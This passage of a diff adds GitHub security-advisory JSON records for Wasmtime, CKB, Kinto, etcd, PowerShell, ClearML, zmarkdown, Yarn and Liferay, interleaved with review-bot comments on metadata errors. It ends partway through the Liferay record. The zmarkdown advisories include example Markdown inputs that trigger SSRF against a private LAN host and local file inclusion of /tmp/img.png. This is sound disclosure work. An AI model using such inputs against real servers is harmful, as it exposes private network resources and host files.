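Review bot: The `summary` of GHSA-h4c3-5275-vrmg carries a trailing space (`"...from the statistics "`), which will show up in feeds and search indexes; it should be `"summary": "Nervos CKB Pool does not remove the conflicting transactions from the statistics",`. The details contain the typo `statics` for `statistics`. `cwe_ids` is empty although the described effect — the pool stays full and rejects all transactions — is a resource-exhaustion denial of service, for which CWE-400 (Uncontrolled Resource Consumption) is the usual classification; worth confirming with the maintainers' advisory before adding it.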
@@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h84q-m8rr-3v9q", + "modified": "2024-02-01T00:15:47Z", + "published": "2024-02-01T00:15:47Z", + "aliases": [ + "CVE-2022-39394" + ], + "summary": "wasmtime_trap_code C API function has out of bounds write vulnerability", + "details": "### Impact\n\nThere is a bug in Wasmtime's C API implementation where the definition of the `wasmtime_trap_code` does not match its declared signature in the `wasmtime/trap.h` header file. This discrepancy causes the function implementation to perform a 4-byte write into a 1-byte buffer provided by the caller. This can lead to three zero bytes being written beyond the 1-byte location provided by the caller.\n\n### Patches\n\nThis bug has been patched and users should upgrade to Wasmtime 2.0.2.\n\n### Workarounds\n\nThis can be worked around by providing a 4-byte buffer casted to a 1-byte buffer when calling `wasmtime_trap_code`. Users of the `wasmtime` crate are not affected by this issue, only users of the C API function `wasmtime_trap_code` are affected.\n\n### References\n\n* [Definition of `wasmtime_trap_code`](https://docs.wasmtime.dev/c-api/trap_8h.html#a6580f4f209d3eaebb6e8b9a901a30b7a)\n* [Mailing list announcement](https://groups.google.com/a/bytecodealliance.org/g/sec-announce/c/c1HBDDJwNPA)\n* [Patch to fix for `main` branch](https://github.com/bytecodealliance/wasmtime/commit/5b6d5e78de106503b3b9add218bb3d2b1d63c493)\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Reach out to us on [the Bytecode Alliance Zulip chat](https://bytecodealliance.zulipchat.com/#narrow/stream/217126-wasmtime)\n* Open an issue in [the bytecodealliance/wasmtime repository](https://github.com/bytecodealliance/wasmtime/)\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "wasmtime" + }, + "ranges": [ + { + 
"type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.0.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "wasmtime" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-h84q-m8rr-3v9q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39394" + }, + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/commit/087d9d7becf7422b3f872a3bcd5d97bb7ce7ff36" + }, + { + "type": "WEB", + "url": "https://github.com/bytecodealliance/wasmtime/commit/5b6d5e78de106503b3b9add218bb3d2b1d63c493" + }, + { + "type": "PACKAGE", + "url": "https://github.com/bytecodealliance/wasmtime" + }, + { + "type": "WEB", + "url": "https://groups.google.com/a/bytecodealliance.org/g/sec-announce/c/c1HBDDJwNPA" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T00:15:47Z", + "nvd_published_at": "2022-11-10T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-hjqq-29pw-96wj/GHSA-hjqq-29pw-96wj.json b/advisories/github-reviewed/2024/02/GHSA-hjqq-29pw-96wj/GHSA-hjqq-29pw-96wj.json new file mode 100644 index 0000000000000..38cd3db82d69b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-hjqq-29pw-96wj/GHSA-hjqq-29pw-96wj.json 
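Review bot: The `affected` entries of GHSA-h84q-m8rr-3v9q list the crates.io package `wasmtime` (0–1.0.2 and 2.0.0–2.0.2), but the `details` state that "Users of the `wasmtime` crate are not affected by this issue, only users of the C API function `wasmtime_trap_code` are affected", so every consumer of the Rust crate in those ranges will receive an alert that the advisory text itself says does not apply to them. Either the affected package should be reviewed so it points at the component that actually ships the C API, or the summary and details should say explicitly that the crate is listed because the C API is built from the same releases. The `nvd_published_at` of 2022-11-10 versus a `published` of 2024-02-01 suggests this is a late import of an older advisory; that is consistent with the 1.x/2.x ranges but worth a sentence in the details so readers are not surprised by the dates.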
@@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hjqq-29pw-96wj", + "modified": "2024-02-02T22:23:11Z", + "published": "2024-02-02T22:23:11Z", + "aliases": [ + + ], + "summary": "Nervos CKB node panics when processing a block which parent timestamp is too new", + "details": "### Impact\n\nAdversary can initiate DOS attack by broadcasting two consecutive blocks with timestamps in the future. \n\n### Patches\n\nPlease upgrade to v0.34.1", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.33.0" + }, + { + "fixed": "0.33.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "ckb" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.34.0" + }, + { + "fixed": "0.34.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-hjqq-29pw-96wj" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/ae3c791068f2f76c67cd5483501f09de3fd8cc0b" + }, + { + "type": "WEB", + "url": "https://github.com/nervosnetwork/ckb/commit/c6725bb0659b6639f384d699f815117d76107388" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T22:23:11Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-hvp4-vrv2-8wrq/GHSA-hvp4-vrv2-8wrq.json b/advisories/github-reviewed/2024/02/GHSA-hvp4-vrv2-8wrq/GHSA-hvp4-vrv2-8wrq.json new file mode 100644 index 0000000000000..310043ca3c79c --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-hvp4-vrv2-8wrq/GHSA-hvp4-vrv2-8wrq.json 
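Review bot: The `details` of GHSA-hjqq-29pw-96wj tell users only to "Please upgrade to v0.34.1", while the `affected` ranges also declare `0.33.2` as a fixed version for the 0.33.x line; the two should agree, e.g. `"### Patches\n\nPlease upgrade to v0.33.2 (0.33.x) or v0.34.1 (0.34.x)`. The `summary` reads `which parent timestamp is too new` and should be `whose parent timestamp is too new`. `severity` is an empty array while `database_specific.severity` is `HIGH`, and `cwe_ids` is empty for what the details describe as a remotely triggered node panic; a CVSS vector and a denial-of-service CWE would make the entry consistent with the other HIGH entries in this commit.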
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvp4-vrv2-8wrq", + "modified": "2024-02-08T18:32:10Z", + "published": "2024-02-08T18:32:10Z", + "aliases": [ + "CVE-2024-1314" + ], + "summary": "Kinto Attachment's attachments can be replaced on read-only records", + "details": "### Impact\n\nThe attachment file of an existing record can be replaced if the user has `\"read\"` permission on one of the parent (collection or bucket).\n\nAnd if the `\"read\"` permission is given to `\"system.Everyone\"` on one of the parent, then the attachment can be replaced on a record using an anonymous request.\n\nNote that if the parent has no explicit read permission, then the records attachments are safe.\n\n### Patches\n\n- Patch released in kinto-attachment 6.4.0\n- https://github.com/Kinto/kinto-attachment/commit/f4a31484f5925cbc02b59ebd37554538ab826ca1\n\n### Workarounds\n\nNone if the read permission has to remain granted.\n\nUpdating to 6.4.0 or applying the patch individually (if updating is not feasible) is strongly recommended.\n\n### References\n\n- https://bugzilla.mozilla.org/show_bug.cgi?id=1879034", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "kinto-attachment" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.4.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.3.2" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Kinto/kinto-attachment/security/advisories/GHSA-hvp4-vrv2-8wrq" + }, + { + "type": "WEB", + "url": "https://github.com/Kinto/kinto-attachment/commit/f4a31484f5925cbc02b59ebd37554538ab826ca1" + }, + { + "type": "WEB", + "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1879034" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Kinto/kinto-attachment" + } + ], + 
"database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:32:10Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-j86v-2vjr-fg8f/GHSA-j86v-2vjr-fg8f.json b/advisories/github-reviewed/2024/02/GHSA-j86v-2vjr-fg8f/GHSA-j86v-2vjr-fg8f.json new file mode 100644 index 0000000000000..9dc863df1b88a --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-j86v-2vjr-fg8f/GHSA-j86v-2vjr-fg8f.json 
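Review bot: `cwe_ids` of GHSA-hvp4-vrv2-8wrq is empty even though the details describe a missing authorization check — an attachment can be replaced by anyone holding only `"read"` on a parent collection or bucket, anonymously if `"system.Everyone"` has it — which maps directly to CWE-285 (Improper Authorization) or CWE-863 (Incorrect Authorization); `"cwe_ids": [ "CWE-285" ]` would make the entry filterable. The `affected` entry is internally consistent (`fixed: 6.4.0` with `last_known_affected_version_range: "<= 6.3.2"`). The `summary` says "read-only records" but the condition in the details is a read permission on a parent, not on the record; rewording the summary to "attachments can be replaced by users with only read access to the parent" would match the details.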
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j86v-2vjr-fg8f", + "modified": "2024-02-03T00:03:04Z", + "published": "2024-02-03T00:03:04Z", + "aliases": [ + + ], + "summary": "Etcd Gateway TLS endpoint validation only confirms TCP reachability", + "details": "### Vulnerability type\nCryptography\n\n### Workarounds\nRefer to the [gateway documentation](https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/gateway.md). The vulnerability was spotted due to unclear documentation of how the gateway handles endpoints validation. \n\n### Detail\nSecure endpoint validation is performed by the etcd gateway start command when the --discovery-srv flag is enabled. However, as currently implemented, it only validates TCP reachability, effectively allowing connections to an endpoint that doesn't accept TLS connections through the HTTPS URL. The auditors has noted that appropriate documentation of this validation functionality plus deprecation of this misleading functionality is an acceptable path forward.\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + 
"type": "WEB",
+ "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-j86v-2vjr-fg8f"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-03T00:03:04Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-jcmq-5rrv-j2g4/GHSA-jcmq-5rrv-j2g4.json b/advisories/github-reviewed/2024/02/GHSA-jcmq-5rrv-j2g4/GHSA-jcmq-5rrv-j2g4.json
new file mode 100644
index 0000000000000..a374bc1e8d8f8
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-jcmq-5rrv-j2g4/GHSA-jcmq-5rrv-j2g4.json
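Review bot: `references` holds only the GHSA URL, while the details cite the audit report `https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf` and the gateway documentation; adding those as `WEB` references and `https://github.com/etcd-io/etcd` as `PACKAGE` would match the other records in this commit. The same gap exists in GHSA-pm3m-32r3-7mfh below, which cites the same audit report. `cwe_ids` is also empty for an endpoint check that, per the details, validates only TCP reachability behind an HTTPS URL; `CWE-295` (Improper Certificate Validation) is the likely fit, though the validating code itself is not in view.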
@@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcmq-5rrv-j2g4", + "modified": "2024-02-02T21:04:47Z", + "published": "2024-02-02T21:04:47Z", + "aliases": [ + + ], + "summary": "PowerShell is subject to remote code execution vulnerability", + "details": "# Microsoft Security Advisory CVE-2020-0605: .NET Framework Remote Code Execution Vulnerability\n\n## Executive Summary\n\nA remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.\n\nAn attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. 
In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file.\n\nThe security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file.\n\n## Discussion\n\nPlease [open a support question](https://github.com/PowerShell/PowerShell/issues/new?assignees=&labels=Issue-Question&template=Support_Question.md&title=Support+Question) to discuss the PowerShell aspects of this advisory.\nPlease use https://github.com/dotnet/wpf/issues/2424 for discussion of the .NET WPF aspects of this advisory.\n\n## Affected Software\n\nThe vulnerability affects PowerShell prior to the following versions:\n\n| PowerShell Core Version | Fixed in |\n|-------------------------|-------------------|\n| 6.2 | Not Affected |\n| 7.0 | 7.0.0 |\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf all of the following are true:\n\n1. Run `pwsh -v`, then, check the version in the table in [Affected Software](#user-content-affected-software) to see if your version of PowerShell is affected.\n1. If you are running a version of PowerShell where the executable is not `pwsh` or `pwsh.exe`, then you are affected. 
This only existed for preview version of `7.0`.\n\n### How do I update to an unaffected version?\n\nFollow the instructions at [Installing PowerShell](https://docs.microsoft.com/en-us/powershell/scripting/setup/installing-powershell?view=powershell-7) to install the latest version of PowerShell.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in PowerShell,\nplease email details to secure@microsoft.com.\n\n### Support\n\nYou can ask questions about this issue on GitHub in the PowerShell organization.\nThis is located at https://github.com/PowerShell/.\nThe Announcements repo (https://github.com/PowerShell/Announcements)\nwill contain this bulletin as an issue and will include a link to a discussion issue where you can ask questions.\n\n### What if the update breaks my script or module?\n\nYou can uninstall the newer version of PowerShell and install the previous version of PowerShell.\nThis should be treated as a temporary measure.\nTherefore, the script or module should be updated to work with the patched version of PowerShell.\n\n### Acknowledgments\n\nSoroush Dalili ([@irsdl](https://twitter.com/irsdl))\n\n### External Links\n\n[CVE-2020-0605](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605)\n\n### Revisions\n\n\nV1.0 (March 10, 2020): Advisory published.\n\n*Version 1.0*\n*Last Updated 2020-03-10*", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "PowerShell" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/PowerShell/PowerShell/security/advisories/GHSA-jcmq-5rrv-j2g4" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + 
"github_reviewed_at": "2024-02-02T21:04:47Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-m95h-p4gg-wfw3/GHSA-m95h-p4gg-wfw3.json b/advisories/github-reviewed/2024/02/GHSA-m95h-p4gg-wfw3/GHSA-m95h-p4gg-wfw3.json
new file mode 100644
index 0000000000000..42cdcf47a6995
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-m95h-p4gg-wfw3/GHSA-m95h-p4gg-wfw3.json
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m95h-p4gg-wfw3",
+ "modified": "2024-02-06T20:28:55Z",
+ "published": "2024-02-06T15:32:07Z",
+ "aliases": [
+ "CVE-2024-24591"
+ ],
+ "summary": "Allegro AI ClearML path traversal vulnerability",
+ "details": "A path traversal vulnerability in version 1.4.0 or newer of Allegro AI’s ClearML platform enables a maliciously uploaded dataset to write local or remote files to an arbitrary location on an end user’s system when interacted with.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "clearml"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0.17.0"
+ },
+ {
+ "last_affected": "1.14.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24591"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/allegroai/clearml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-06T20:28:55Z",
+ "nvd_published_at": "2024-02-06T15:15:09Z"
+ }
+}
\ No newline at end of file
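Review bot: The PowerShell range `introduced: "0"` / `fixed: "7.0.0"` marks every release before 7.0.0 as vulnerable, but the embedded table lists 6.2 as `Not Affected` and the FAQ states the issue `only existed for preview version of 7.0`; `introduced` should be the first affected 7.0 preview rather than `0`, otherwise every 6.x consumer gets a false alert. `aliases` is also empty even though the details are headed `CVE-2020-0605`; adding `"CVE-2020-0605"` there lets tooling correlate this record with the MSRC entry already linked under External Links. This hunk starts on an earlier line than the one this note is anchored to.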
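Review bot: The ClearML details say the traversal exists in `version 1.4.0 or newer`, but the range begins at `introduced: "0.17.0"`; one of the two is wrong, and the prose and range should agree before this is published. There is also no `fixed` event, only `last_affected: "1.14.1"`, so consumers will keep flagging every later release until a fix version is recorded; if no fix existed at review time, a sentence saying so in the details would make that intentional rather than look like an omission.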
diff --git a/advisories/github-reviewed/2024/02/GHSA-mf74-qq7w-6j7v/GHSA-mf74-qq7w-6j7v.json b/advisories/github-reviewed/2024/02/GHSA-mf74-qq7w-6j7v/GHSA-mf74-qq7w-6j7v.json
new file mode 100644
index 0000000000000..2b487c4c11efb
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-mf74-qq7w-6j7v/GHSA-mf74-qq7w-6j7v.json
@@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mf74-qq7w-6j7v", + "modified": "2024-02-03T00:38:22Z", + "published": "2024-02-03T00:38:22Z", + "aliases": [ + + ], + "summary": "Zmarkdown Server-Side Request Forgery (SSRF) in remark-download-images", + "details": "### Impact\n\nA major blind SSRF has been found in `remark-images-download`, which allowed\nfor requests to be made to neighboring servers on local IP ranges.\nThe issue came from a loose filtering of URLs inside the module.\n\nImagine a server running on a private network `192.168.1.0/24`.\nA private service serving images is running on `192.168.1.2`, and\nis not expected to be accessed by users. A machine is running\n`remark-images-download` on the neighboring `192.168.1.3` host.\nAn user enters the following Markdown:\n\n```markdown\n![](http://192.168.1.2/private-img.png)\n```\n\nThe image is downloaded by the server and included inside the resulting\ndocument. Hence, the user has access to the private image.\n\nIt has been corrected by preventing images downloads from\nlocal IP ranges, both in IPv4 and IPv6.\nTo avoid malicious domain names, resolved local IPs from are also\nforbidden inside the module.\nThis vulnerability impact is moderate, as it is can allow access to\nunexposed documents on the local network, and is very easy\nto exploit.\n\n### Patches\n\nThe vulnerability has been patched in version 3.1.0.\nIf impacted, you should update to this version as soon as possible.\n\nPlease note that a minor version has been released instead of a bugfix.\nThis is due to a new option included to prevent another vulnerability,\nupgrading to the new version will not break compatibility.\n\n### Workarounds\n\nNo workaround is known, the package should be upgraded.\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues).\n", + "severity": [ + + ], + "affected": [ + { + "package": 
{
+ "ecosystem": "npm",
+ "name": "zmarkdown"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "3.1.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/zestedesavoir/zmarkdown/security/advisories/GHSA-mf74-qq7w-6j7v"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-03T00:38:22Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-mpwj-fcr6-x34c/GHSA-mpwj-fcr6-x34c.json b/advisories/github-reviewed/2024/02/GHSA-mpwj-fcr6-x34c/GHSA-mpwj-fcr6-x34c.json
new file mode 100644
index 0000000000000..35a76b8e6be0c
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-mpwj-fcr6-x34c/GHSA-mpwj-fcr6-x34c.json
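Review bot: The summary names the module `remark-download-images`, while the details consistently call it `remark-images-download`; the summary should use the same name as the details so searches match. `cwe_ids` is empty for what the details describe as a blind SSRF against local IP ranges; `CWE-918` (Server-Side Request Forgery) is the standard id. Only `zmarkdown` is listed under `affected`, so if the module named in the details is separately published on npm it is not covered by this record — worth confirming. This hunk starts on an earlier line than the one this note is anchored to.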
@@ -0,0 +1,73 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mpwj-fcr6-x34c",
+ "modified": "2024-02-05T20:20:29Z",
+ "published": "2024-02-04T21:30:43Z",
+ "aliases": [
+ "CVE-2021-4435"
+ ],
+ "summary": "Yarn untrusted search path vulnerability",
+ "details": "An untrusted search path vulnerability was found in Yarn. When a victim runs certain Yarn commands in a directory with attacker-controlled content, malicious commands could be executed in unexpected ways.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "yarn"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.22.13"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4435"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yarnpkg/yarn/commit/67fcce88935e45092ffa2674c08053f1ef5268a1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2021-4435"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262284"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/yarnpkg/yarn"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yarnpkg/yarn/releases/tag/v1.22.13"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-426"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-05T20:20:29Z",
+ "nvd_published_at": "2024-02-04T20:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-mq6v-w35g-3c97/GHSA-mq6v-w35g-3c97.json b/advisories/github-reviewed/2024/02/GHSA-mq6v-w35g-3c97/GHSA-mq6v-w35g-3c97.json
new file mode 100644
index 0000000000000..1f1bdcdc93406
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-mq6v-w35g-3c97/GHSA-mq6v-w35g-3c97.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mq6v-w35g-3c97",
+ "modified": "2024-02-03T00:37:56Z",
+ "published": "2024-02-03T00:37:56Z",
+ "aliases": [
+
+ ],
+ "summary": "Local File Inclusion vulnerability in zmarkdown",
+ "details": "### Impact\n\nA minor Local File Inclusion vulnerability has been found in\n`zmarkdown`, which allowed for images with a known path on\nthe host machine to be included inside a LaTeX document.\n\nTo prevent it, a new option has been created that allow to replace\ninvalid paths with a default image instead of linking the image on the\nhost directly. `zmarkdown` has been updated to make this setting the\ndefault.\n\nEvery user of `zmarkdown` is likely impacted, except if\ndisabling LaTeX generation or images download. Here\nis an example of including an image from an invalid path:\n\n```markdown\n![](/tmp/img.png)\n```\n\nWill effectively redownload and include the image\nfound at `/tmp/img.png`.\n\n### Patches\n\nThe vulnerability has been patched in version 10.1.3.\nIf impacted, you should update to this version as soon as possible.\n\n### Workarounds\n\nDisable images downloading, or sanitize paths.\n\n### For more information\n\nIf you have any questions or comments about this advisory, open an issue in [ZMarkdown](https://github.com/zestedesavoir/zmarkdown/issues).\n",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "zmarkdown"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "10.1.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/zestedesavoir/zmarkdown/security/advisories/GHSA-mq6v-w35g-3c97"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-03T00:37:56Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
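Review bot: `cwe_ids` is empty for an issue the details describe as pulling host-local paths such as `/tmp/img.png` into the generated LaTeX document; `CWE-22` (used by GHSA-m95h-p4gg-wfw3 in this same commit) or a path-control weakness would fit. `severity` is `[]` while `database_specific.severity` is `LOW`, so downstream tooling gets a label with no vector to reproduce it from; if the rating was derived from a CVSS assessment, recording the `CVSS_V3` entry would make it auditable.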
diff --git a/advisories/github-reviewed/2024/02/GHSA-mqf8-4cqm-p83x/GHSA-mqf8-4cqm-p83x.json b/advisories/github-reviewed/2024/02/GHSA-mqf8-4cqm-p83x/GHSA-mqf8-4cqm-p83x.json
new file mode 100644
index 0000000000000..8bd450bb34fa2
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-mqf8-4cqm-p83x/GHSA-mqf8-4cqm-p83x.json
@@ -0,0 +1,99 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqf8-4cqm-p83x", + "modified": "2024-02-08T18:30:36Z", + "published": "2024-02-08T06:30:23Z", + "aliases": [ + "CVE-2024-25146" + ], + "summary": "Liferay Portal allows attackers to discover the existence of sites", + "details": "Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 18, and older unsupported versions returns with different responses depending on whether a site does not exist or if the user does not have permission to access the site, which allows remote attackers to discover the existence of sites by enumerating URLs. This vulnerability occurs if locale.prepend.friendly.url.style=2 and if a custom 404 page is used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.portal.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.3.0" + }, + { + "fixed": "7.3.10.u4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay.portal:release.dxp.bom" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.2.0" + }, + { + "fixed": "7.2.10.fp18" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25146" + }, + { + "type": "PACKAGE", + "url": "https://github.com/liferay/liferay-portal" + }, + { + 